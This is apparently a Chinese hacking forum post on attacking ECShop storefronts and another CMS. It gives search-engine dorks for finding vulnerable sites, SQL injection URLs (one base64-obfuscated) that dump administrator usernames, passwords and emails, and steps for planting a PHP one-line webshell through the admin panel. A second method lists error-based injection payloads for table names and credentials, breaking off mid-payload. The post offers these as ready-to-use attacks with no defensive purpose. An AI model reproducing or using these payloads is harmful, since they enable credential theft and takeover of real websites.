昨晚上翻閱一本技術書籍中,找到靈感,發現的ECshop漏洞。
搜索關鍵字:關鍵字:powered by ecshop
方法一:
普通代碼:
user.php?act=order_query&order_sn=* union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
變種代碼:
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
直接在網站后台加入代碼回車就能爆出帳號密碼,再去掉代碼加上/admin回車就能直接進后台了。
拿shell方法很簡單,找到“庫項目管理”再選擇“配送的方式”,在代碼最下面插入php一句話木馬: 不行就換php木馬的預代碼!
接着保存,一句話路徑是:http://www.xxx.org/myship.php ; 打開“ASP+PHP兩用Shell.html”填入地址,點擊一下環境變量,成功之后點擊上傳文件就可以拿shell了。
方法二
關鍵字:
inurl:index.php?ac=article&at=read&did=
默認后台:adminsoft/index.php 或者 admin/
注入點(爆表前綴,比如:cm_admin......前綴就是cm,后面3個代碼要自行替換):
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆用戶名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密碼:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((sele
(后面的內容百度下吧 )